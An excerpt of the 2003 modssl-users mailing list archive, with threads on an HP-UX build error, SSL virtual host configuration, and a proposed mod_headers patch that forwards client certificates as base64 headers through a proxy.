	by gamay.kronodoc.fi (Postfix) with ESMTP id 98C6E240A5
	for ; Wed, 19 Feb 2003 15:40:36 +0200 (EET)
Date: Wed, 19 Feb 2003 15:40:36 +0200 (EET)
From: Marko Asplund 
To: modssl-users@modssl.org
Subject: Re: Preprocessor bug in ssl_exp_scan.l when building with native
 compiler on HP-UX 11
In-Reply-To: <3E3FAB7B.2050000@micromuse.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 4 Feb 2003, Stuart Cook wrote:

> I have been building Apache 1.3.27 on HP-UX 11 via the native compiler 
> with Mod SSL 2.8.12-1.3.27 and have come across and resolved a build bug 
> during the Apache compilation process.
> 
> In the Mod SSL file .../pkg.sslmod/ssl_expr_scan.l from line 91 onwards 
> there is a state variable 'str'.  The native C pre-processor converts 
> this to 1 and errors with:
> 
> /opt/ansic/bin/cc -c  -I../../os/unix -I../../include   -DHPUX11 -Aa -Ae 
> -D_HPUX_SOURCE -DMOD_SSL=208112 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT 
> -I../../lib/expat-lite `../../apaci` -DSSL_COMPAT -DSSL_ENGINE 
> -I/build/reporter/apache/openssl-engine-0.9.6g/include 
> -DMOD_SSL_VERSION=\"2.8.12\" ssl_expr_scan.c
> cc: "lex.ssl_expr_yy.c", line 1753: error 1000: Unexpected symbol: "1".
> cc: "lex.ssl_expr_yy.c", line 1760: error 1720: Subscript expression 
> must combine object pointer and integer.
> cc: "lex.ssl_expr_yy.c", line 1760: error 1566: Test expression in for 
> must be scalar.
> cc: "lex.ssl_expr_yy.c", line 1763: warning 527: Integral value 
> implicitly converted to pointer in assignment.
> cc: "lex.ssl_expr_yy.c", line 1763: warning 563: Argument #1 is not the 
> correct type.
> *** Error exit code 1
> 
> This can be resolved by changing .../pkg.sslmod/ssl_expr_scan.l state 
> variable to 'str_state' or some other value than 'str'.

i've been building Apache v1.3.27 with mod_ssl-2.8.12-1.3.27 and OpenSSL
v0.9.6h (non-engine) using HP Ansi C compiler on HP-UX 11.00 with no
problems. here's the compilation command for ssl_expr_scan.c.

cc -c  -I../../os/unix -I../../include   -DHPUX11 -Aa -Ae -D_HPUX_SOURCE -DMOD_SSL=208112 -I/opt/kronodoc/openldap/2.0.27-kb3/include -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED -DNO_IDEA -noshared `../../apaci` -DSSL_COMPAT -I/opt/local/openssl/0.9.6h-apache/include -DMOD_SSL_VERSION=\"2.8.12\" ssl_expr_scan.c

-- 
	aspa					http://www.kronodoc.fi/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 14:58:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB5C22AA015; Wed, 19 Feb 2003 14:58:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta201-rme.xtra.co.nz (mta201-rme.xtra.co.nz [210.86.15.144])
	by master.modssl.org (Postfix) with ESMTP id 4A37C2AA002
	for ; Wed, 19 Feb 2003 14:58:49 +0100 (CET)
Received: from mta2-rme.xtra.co.nz ([210.86.15.140])
          by mta204-rme.xtra.co.nz with ESMTP
          id <20030214080332.VATG1188.mta204-rme.xtra.co.nz@mta2-rme.xtra.co.nz>;
          Fri, 14 Feb 2003 21:03:32 +1300
Received: from xtra.co.nz ([210.86.54.166]) by mta2-rme.xtra.co.nz
          with ESMTP
          id <20030214080332.RMGA18636.mta2-rme.xtra.co.nz@xtra.co.nz>;
          Fri, 14 Feb 2003 21:03:32 +1300
Message-ID: <3E4CA2D3.3040500@xtra.co.nz>
Date: Fri, 14 Feb 2003 21:03:31 +1300
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1) Gecko/20021207
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: tried everything on linux but SSL will not work
References: <8FC4E7C302A6A64AAD5DB1FA0E825DEB44AC38@hendrix.empolisuk.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a completely wild guess based on not much information, but since 
I gather you have two independent https servers that have failed on 
linux, have you checked your iptables / ipchains config?

Otherwise you need to do some more checking, e.g.:

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 15:48:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B861A2AA014; Wed, 19 Feb 2003 15:48:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from powerweb.net (mail.powerweb.net [64.118.32.23])
	by master.modssl.org (Postfix) with ESMTP id 24B8B2AA000
	for ; Wed, 19 Feb 2003 15:47:57 +0100 (CET)
Received: from [64.118.32.89] (HELO there)
  by powerweb.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 34154953 for modssl-users@modssl.org; Wed, 19 Feb 2003 08:54:19 -0600
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ray a PowerWeb Tech 
Organization: PowerWeb Connect
To: modssl-users@modssl.org
Subject: mass ip virtual host & mod_ssl?
Date: Wed, 19 Feb 2003 08:40:06 -0600
X-Mailer: KMail [version 1.3.2]
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ray a PowerWeb Tech 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

is it possible using either mod_rewrite, mod_vhosts_alias or some trick i=
n=20
mod_ssl to have multiple virtual hosts by ip address and there keys

was thinking something like=20
# get the server name from the Host: header
UseCanonicalName Off

# this log format can be split per-virtual-host based on the first field
LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon
CustomLog logs/access_log vcommon

# include the server name in the filenames used to satisfy requests
VirtualDocumentRoot /www/hosts/%0/docs
VirtualScriptAlias  /www/hosts/%0/cgi-bin

as per=20
http://httpd.apache.org/docs/vhosts/mass.html#ipbased

but some of the domains have SSL, and it doesn't seem like this will cove=
r it=20
as is.  how do i setup a folder for keys that will be used?
ie /www/certs/%0.key
or does it automagicly pick the correct key for the ip/domain?

i'm hoping to get it so that by droping files into the correct places, ou=
r=20
customer will be able to add/remove domains without having to have the=20
ability to restart apache (as its on windows, he would need nearly total=20
control of the machine to do this)

--=20
Eternity is a terrible thought.  I mean, where's it going to end?
=09=09-- Tom Stoppard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 16:21:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E27E32AA014; Wed, 19 Feb 2003 16:21:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id ACB4A2AA000
	for ; Wed, 19 Feb 2003 16:20:59 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA08125;
	Wed, 19 Feb 2003 10:19:38 -0500
Date: Wed, 19 Feb 2003 10:19:36 -0500 (EST)
From: "R. DuFresne" 
To: Steve Pirk 
Cc: modssl-users@modssl.org
Subject: Re: Multiple SSL VirtualHosts in apache
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


The error you posted from logs implies the request the server is getting
is http rather then https, perhaps your  redirect or rewrite is not
functioning properly?

Thanks,

Ron DuFresne

On Wed, 5 Feb 2003, Steve Pirk wrote:

> I check the mail archives, but could not find a good
> answer for this "problem" I am having.
> 
> I am building out a dev environment using apache
> on Solaris. The dev environment needs to run under
> SSL (to simulate the production environment). I am
> starting with 4 virtual servers. They all use the
> same cert file, but are on different ports.
> 
> The problem I am running into is that only the "first"
> VirtualHost works. Requests to subsequent ports result
> in a mod_ssl:error:HTTP-request error. Here is the error_log
> entry:
> 
> [Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
> spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> error follows)
> [Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
> routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking HTTP to HTTPS
> port!?]
> 
> This is being used in conjunction with an auth package,
> but the redirect after logging in is https://
> 
> Does anyone knnow of a good way to have multiple
> SSL virtual servers on one apache instance?
> 
> Here is a sample of httpd.conf. In this case, port 7000
> works, but 7001 and 7002 get the mod_ssl error.
> 
>   
>     DocumentRoot        /some/doc/root
>     SSLEngine on
>     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>   
> 
>   
>     DocumentRoot        /some/doc/root
>     SSLEngine on
>     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>   
> 
>   
>     DocumentRoot        /some/doc/root
>     SSLEngine on
>     SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>     SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>   
> 
> --
> Steve (egrep)
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 16:27:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B5572AA014; Wed, 19 Feb 2003 16:27:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 875B52AA000
	for ; Wed, 19 Feb 2003 16:27:29 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h1JFQjj5002284
	for ; Wed, 19 Feb 2003 10:26:46 -0500
Date: Wed, 19 Feb 2003 10:26:45 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Multiple SSL VirtualHosts in apache
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 5 Feb 2003, Steve Pirk wrote:

> They all use the same cert file, but are on different ports.

I'm not so sure you can do that.  But anyway, assuming for a second that
you can:

> The problem I am running into is that only the "first"
> VirtualHost works. Requests to subsequent ports result
> in a mod_ssl:error:HTTP-request error. Here is the error_log
> entry:

Interesting.  What version of Apache is this?  If 1.3.x, what version of
mod_ssl?  The mod_ssl:error:HTTP-request thing is supposed to be purely
internal; if it ever leaks out to the client, something is screwed up.  I
found some odd cases a while back where you could set up redirections in
an odd way and it would do that, but I've forgotten the details and would
have to dig them up.  What redirects are you doing?  Any rewriterules?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 16:38:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5CFCB2AA002; Wed, 19 Feb 2003 16:38:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 888B82AA014
	for ; Wed, 19 Feb 2003 16:38:07 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h1JFbN3l002298
	for ; Wed, 19 Feb 2003 10:37:24 -0500
Date: Wed, 19 Feb 2003 10:37:23 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: mass ip virtual host & mod_ssl?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 19 Feb 2003, Ray a PowerWeb Tech wrote:

> but some of the domains have SSL, and it doesn't seem like this will
> cover it as is.  how do i setup a folder for keys that will be used? ie
> /www/certs/%0.key or does it automagicly pick the correct key for the
> ip/domain?
>
> i'm hoping to get it so that by droping files into the correct places,
> our customer will be able to add/remove domains without having to have
> the ability to restart apache (as its on windows, he would need nearly
> total control of the machine to do this)

Nope, sorry, you can't do that.  You have to have real virtual hosts set
up for each SSL vhost; mod_vhost_alias won't cut it.  That's not to
mention the fact that changing or adding SSL keys/certs requires
restarting Apache anyway to reinitialize OpenSSL.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 17:09:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 474F42AA014; Wed, 19 Feb 2003 17:09:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpde02.sap-ag.de (smtpde02.sap-ag.de [155.56.68.170])
	by master.modssl.org (Postfix) with ESMTP id A8F6C2AA000
	for ; Wed, 19 Feb 2003 17:09:24 +0100 (CET)
Received: from sap-ag.de (smtpde02)
  by smtpde02.sap-ag.de (out) with ESMTP id RAA29383
  for ; Wed, 19 Feb 2003 17:09:33 +0100 (MEZ)
Message-Id: <200302191609.RAA28734@hw1464.wdf.sap.corp>
Date: Wed, 19 Feb 2003 17:08:56 +0100
From: Maik Mueller 
To: modssl-users@modssl.org
Cc: maik@sap.com
Subject: Patches and Enhancements for a SSL-Proxy Based on Apache 2.0 
 (mod_ssl, mod_proxy, mod_headers)
X-Mailer: Maik Mueller's registered AK-Mail 3.11 [ger]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-SAP: out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maik Mueller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

I want to provide updated information to my earlier described scenario using
mod_ssl + mod_proxy + mod_headers:
Component:	Web Browser --- Proxy (mod_proxy)       --- Web Server
SSL Role:	SSL Client  --- SSL server | SSL Client --- SSL Server

The following discussion focuses on Apache 2.0.43 and 2.0.44.

I have implemented a solution to transfer the Web browser's client
certificate (and other SSL information) to the backend Web server:
Component:	Web Browser --- Proxy (mod_proxy)       --- Web Server
SSL Role:	SSL Client  --- SSL server | SSL Client --- SSL Server
				Client Cert (and other SSL information) --> Transfer as HTTP Headers

The problem was that mod_headers' RequestHeader directive didn't really
matched the requirements.
RequestHeader set SSL_CLIENT_CERT %{SSL_CLIENT_CERT}e is not a practical
solution to
forward the client's certificate to the backend server for the
following reasons:
1. SSL_CLIENT_CERT produces multi-line output and the RequestHeader
directive isn't able to transfer it into a correct multi-line HTTP header.
2. The "decorations" (-----BEGIN/END CERTIFICATE-----) and the multi-line
format are not very useful in this scenario.

Therefore I have introduced the option "E" in addition to "e" for putting
environment variables in headers. The "E" has the following meaning:

%{FOOBAR}E	The base64 encoded content of the environment variable FOOBAR.
If the environment variable already contains a base64 encoded body (e. g.
SSL_CLIENT_CERT) the body will be set as the value of the header variable.

The result is in any case a single line of base64 characters only.

This behavior serves two requirements:
1. There is no problem escaping special characters when putting other SSL
information in HTTP headers. In many cases, SSL_CLIENT_S_DN will probably
contain characters that have to be escaped.
2. Reduces the overhead produced by "decorations" and multi-line format.

Here is an example for forwarding the SSL Client Certificate and other SSL
information:
    RequestHeader set SSL_CLIENT_CERT         %{SSL_CLIENT_CERT}E
env=SSL_CLIENT_S_DN
    RequestHeader set SSL_CLIENT_CERT_CHAIN_0 %{SSL_CLIENT_CERT_CHAIN_0}E
env=SSL_CLIENT_CERT_CHAIN_0
    RequestHeader set SSL_CLIENT_CERT_CHAIN_1 %{SSL_CLIENT_CERT_CHAIN_1}E
env=SSL_CLIENT_CERT_CHAIN_1
    RequestHeader set SSL_CIPHER_USEKEYSIZE   %{SSL_CIPHER_USEKEYSIZE}e
env=SSL_CIPHER_USEKEYSIZE
    RequestHeader set SSL_CIPHER_SUITE        %{SSL_CIPHER}e
env=SSL_CIPHER

To make this work I also patched two other things:
1. mod_headers' RequestHeader directive wasn't able to take an env clause as
a forth argument in contrast to the Header directive. I don't know the
reason
for that behavior, but env clause seams to work fine with the SSL
environment
variables for RequestHeaders. This was necessary to avoid an empty header if
the environment variable isn't present.
If there are objections, let me know.
2. SSL_CLIENT_CERT_CHAIN_n is broken. To me it seems that somebody has tried
to change SSL_CLIENT_CERT_CHAINn to SSL_CLIENT_CERT_CHAIN_n. However, the
introduction of the "_" wasn't quite consistent. I patched that and now I
can see the intermediate CAs as SSL_CLIENT_CERT_CHAIN_0 to
SSL_CLIENT_CERT_CHAIN_n in the environment.

Last but not least I have updated the mod_headers documentation with the new
option "E" and an example for forwarding the Web browser's client
certificate and some other SSL information.

I think the described patches and enhancements are quite reasonable and I
would like to make them part of the standard Apache distribution. I have
already produced a patch file that works for Apache 2.0.43 and 2.0.44. I
would appreciate guidance on how to proceed.

Comments welcome!

Regards,
	Maik

Maik Mueller
Development Architect
SAP

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 17:10:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 33A672AA01A; Wed, 19 Feb 2003 17:10:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpde02.sap-ag.de (smtpde02.sap-ag.de [155.56.68.170])
	by master.modssl.org (Postfix) with ESMTP id EE0A52AA002
	for ; Wed, 19 Feb 2003 17:10:24 +0100 (CET)
Received: from sap-ag.de (smtpde02)
  by smtpde02.sap-ag.de (out) with ESMTP id RAA00243
  for ; Wed, 19 Feb 2003 17:10:32 +0100 (MEZ)
Message-Id: <200302191610.RAA28749@hw1464.wdf.sap.corp>
Date: Wed, 19 Feb 2003 17:10:12 +0100
From: Maik Mueller 
To: modssl-users@modssl.org
Cc: maik@sap.com
Subject: RE: Patches and Enhancements for a SSL-Proxy Based on Apache 2.0  
 (mod_ssl, mod_proxy, mod_headers)
X-Mailer: Maik Mueller's registered AK-Mail 3.11 [ger]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-SAP: out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maik Mueller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Cool..

> Can you please post the patch to the list, so that ppl can review the
> code,
> and give their comments.

> -Madhu
No problem!
Here is my short README describing the patch and its history form Apache
version 2.0.43 to 2.0.44:

Hello!
This is the distribution point for the Apache 2.0 as SSL Intermediary Patch.
Currently you need this patch to use Apache 2.0 as a trusted intermediary
in configuration with the SAP J2EE Engine.
The patch is subject to become part of the standard Apache 2.0 distribution.

Feedback welcome!
	Maik (maik.mueller@sap.com)

INSTRUCTIONS:
- extract the Apache 2.0.43 distribution (httpd-2.0.43.tar.gz)
- change directory to httpd-2.0.43
- apply the patch with -p1 (patch -p1 < Apache-2.0.43-SSLintermediary.patch)
- follow the Apache INSTALL instructions

HISTORY:
02-12-30 initial release (available SAP internal)
03-01-07 httpd-2.0.43-patched-as-SSLintermediary.zip added
         In this ZIP archive the Apache-2.0.43-SSLintermediary.patch is
         already applied. More convenient for users not so familiar with the
         usage of diff & patch.
03-01-08 httpd-2.0.43-win32-src-patched-as-SSLintermediary.zip added
         You cannot use the UNIX source to build the WIN32 binaries.
         This ZIP archive contains the already patched version of
         httpd-2.0.43-win32-src. Use it to build the WIN32 binaries.
         If you want to apply Apache-2.0.43-SSLintermediary.patch to the
         original httpd-2.0.43-win32-src be aware that you have to convert
         CR-LFs in CR before applying the patch. In the successfully patched
         files you can again expand CR to CR-LF.
03-01-20 Bug in base 64 padding found. The calculation of the number of
padding
         characters ('=') needed computes wrong results in some cases.
03-02-07 Apache 2.0.44 Released
         Apache-2.0.44-SSLintermediary.patch corresponds to
httpd-2.0.44.tar.gz
         The documentation changes are NO longer part of the patch.
         Download mod_headers_mai.html.en for proposed documentation
changes.
         SSLproxy.conf is a good example for a proxy's mod_ssl
configuration.
         The SAP proposed header names are use in the example added to the
         mod_headers documentation (see mod_headers_mai.html.en).

And here follows the patch (My proposed changes to the HTML docu are now not
included in the patch. Please advice me if and how to post this changes to
mod_headers.html.en):
--- httpd-2.0.44.ori/modules/metadata/mod_headers.c	Mon Nov  4 19:31:57 2002
+++ httpd-2.0.44/modules/metadata/mod_headers.c	Fri Feb  7 18:00:18 2003
@@ -109,6 +109,7 @@
 #include "apr_lib.h"
 #include "apr_strings.h"
 #include "apr_buckets.h"
+#include "apr_base64.h"

 #include "apr_hash.h"
 #define APR_WANT_STRFUNC
@@ -198,6 +199,62 @@
     else
         return "(null)";
 }
+
+/* Base 64 encoded ASN.1 data is usually tagged with decorations of
+ * the following style:
+ *   -----BEGIN -----
+ *   
+ *   -----END -----
+ * The defines are used to search for such decorations.
+ */
+#define DECORATION_MARKER_BEGIN "-----BEGIN"
+#define DECORATION_MARKER_END   "-----END"
+#define DECORATION_EOF_MARKER   "-----"
+
+static const char *header_request_env_varB64(request_rec *r, char *a)
+{
+  const char *s = apr_table_get(r->subprocess_env,a);
+  char *pStartBody = NULL;
+  char *pBehindBody = NULL;
+  char *ptr;
+
+  if (s) {
+    /* search for decorations marking encapsulated base64 encoded data */
+    ptr = strstr((char *)s, DECORATION_MARKER_BEGIN);
+    if (ptr) {
+      ptr = strstr(ptr + strlen(DECORATION_MARKER_BEGIN),
DECORATION_EOF_MARKER);
+      if (ptr && (ptr + strlen(DECORATION_EOF_MARKER) + 1) != '\0') {
+	/* explicit check that there are sitll chars in the string */
+	pStartBody = ptr + strlen(DECORATION_EOF_MARKER) + 1;
+
+	ptr = strstr(pStartBody, DECORATION_MARKER_END);
+	if (ptr && strstr(ptr, DECORATION_EOF_MARKER))
+	  pBehindBody = ptr;
+      }
+    }
+
+    if (pStartBody && pBehindBody) {
+      /* encapsulated base64 encoded data found */
+      /* all except the body will be skipped */
+      *pBehindBody = '\0';
+      apr_base64_cleanB64(pStartBody);
+      return pStartBody;
+    } else {
+      /* call apr_base64_encode() to encode the data */
+      int inlen = strlen(s);
+      int outsize = apr_base64_encode_len(inlen);
+      char *encoded = apr_palloc(r->pool, outsize);
+      int rc = apr_base64_encode(encoded, s, inlen);
+      if (rc > outsize)
+	return "(null)";
+      else
+	return encoded;
+    }
+  }
+  else
+    return "(null)";
+}
+
 /*
  * Config routines
  */
@@ -407,7 +464,7 @@

     /* Handle the envclause on Header */
     if (envclause != NULL) {
-        if (inout != hdr_out) {
+        if (inout != hdr_out && inout != hdr_in) {
             return "error: envclause (env=...) only valid on Header
directive";
         }
         if (strncasecmp(envclause, "env=", 4) != 0) {
@@ -448,12 +505,23 @@
     return header_inout_cmd(hdr_out, cmd, indirconf, action, hdr, val,
envclause);
 }

-/* handle RequestHeader directive */
+/* handle RequestHeader directive (enable env clause) */
 static const char *request_header_cmd(cmd_parms *cmd, void *indirconf,
-                              const char *action, const char *inhdr,
-                              const char *value)
+                                      const char *args)
 {
-    return header_inout_cmd(hdr_in, cmd, indirconf, action, inhdr, value,
NULL);
+    const char *s;
+    const char *action;
+    const char *hdr;
+    const char *val;
+    const char *envclause;
+
+    s = apr_pstrdup(cmd->pool, args);
+    action = ap_getword_conf(cmd->pool, &s);
+    hdr = ap_getword_conf(cmd->pool, &s);
+    val = *s ? ap_getword_conf(cmd->pool, &s) : NULL;
+    envclause = *s ? ap_getword_conf(cmd->pool, &s) : NULL;
+
+    return header_inout_cmd(hdr_in, cmd, indirconf, action, hdr, val,
envclause);
 }

 /*
@@ -595,8 +663,8 @@
 {
     AP_INIT_RAW_ARGS("Header", header_cmd, NULL, OR_FILEINFO,
                    "an action, header and value followed by optional env
clause"),
-    AP_INIT_TAKE23("RequestHeader", request_header_cmd, NULL, OR_FILEINFO,
-                   "an action, header and value"),
+    AP_INIT_RAW_ARGS("RequestHeader", request_header_cmd, NULL,
OR_FILEINFO,
+                   "an action, header and value followed by optional env
clause"),
     {NULL}
 };

@@ -612,6 +680,7 @@
     register_format_tag_handler(p, "D", (void*) header_request_duration,
0);
     register_format_tag_handler(p, "t", (void*) header_request_time, 0);
     register_format_tag_handler(p, "e", (void*) header_request_env_var, 0);
+    register_format_tag_handler(p, "E", (void*) header_request_env_varB64,
0);

     return OK;
 }
--- httpd-2.0.43.ori/srclib/apr-util/encoding/apr_base64.c	Wed Mar 13
21:40:47 2002
+++ httpd-2.0.43/srclib/apr-util/encoding/apr_base64.c	Sat Dec 28 18:18:21
2002
@@ -229,6 +229,31 @@
     return nbytesdecoded;
 }

+/* This function removes all non-base64 characters.
+ * Useful to get rid of spaces, CR, LF and other formatting characters.
+ */
+APU_DECLARE(int) apr_base64_cleanB64(char *bufcoded)
+{
+  char *ptr = bufcoded;
+  int len = strlen(bufcoded);
+  int i;
+
+  for (i = 0; i < len; i++)
+    if (pr2six[bufcoded[i]] <= 63)
+      *ptr++ = bufcoded[i];
+
+  /* reapply correct base64 padding */
+  switch ((ptr - bufcoded) % 4) {
+  case 2: /* TWO padding characters needed */
+    *ptr++ = '=';
+  case 3: /* ONE padding character needed */
+    *ptr++ = '=';
+  }
+  *ptr++ = '\0';
+
+  return (ptr - bufcoded);
+}
+
 static const char basis_64[] =
     "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

--- httpd-2.0.43.ori/srclib/apr-util/include/apr_base64.h	Wed Mar 13
21:40:48 2002
+++ httpd-2.0.43/srclib/apr-util/include/apr_base64.h	Sun Dec 29 09:31:57
2002
@@ -142,6 +142,14 @@
 APU_DECLARE(int) apr_base64_decode_binary(unsigned char * plain_dst,
                                         const char *coded_src);

+/**
+ * This function removes all non-base64 characters.
+ * Useful to get rid of spaces, CR, LF and other formatting characters.
+ * @param bufcoded The encoded string (input/output)
+ * @return The new length of the encoded string
+ */
+APU_DECLARE(int) apr_base64_cleanB64(char *bufcoded);
+
 /** @} */
 #ifdef __cplusplus
 }
--- httpd-2.0.43.ori/modules/ssl/ssl_engine_vars.c	Tue May 28 23:47:31 2002
+++ httpd-2.0.43/modules/ssl/ssl_engine_vars.c	Sun Dec 29 15:42:59 2002
@@ -479,6 +479,9 @@

     result = NULL;

+    /* Fix inconsistency with SSL_CLIENT_CERT_CHAIN
+       Ignore '_' between SSL_CLIENT_CERT_CHAIN and the subsequent number.
*/
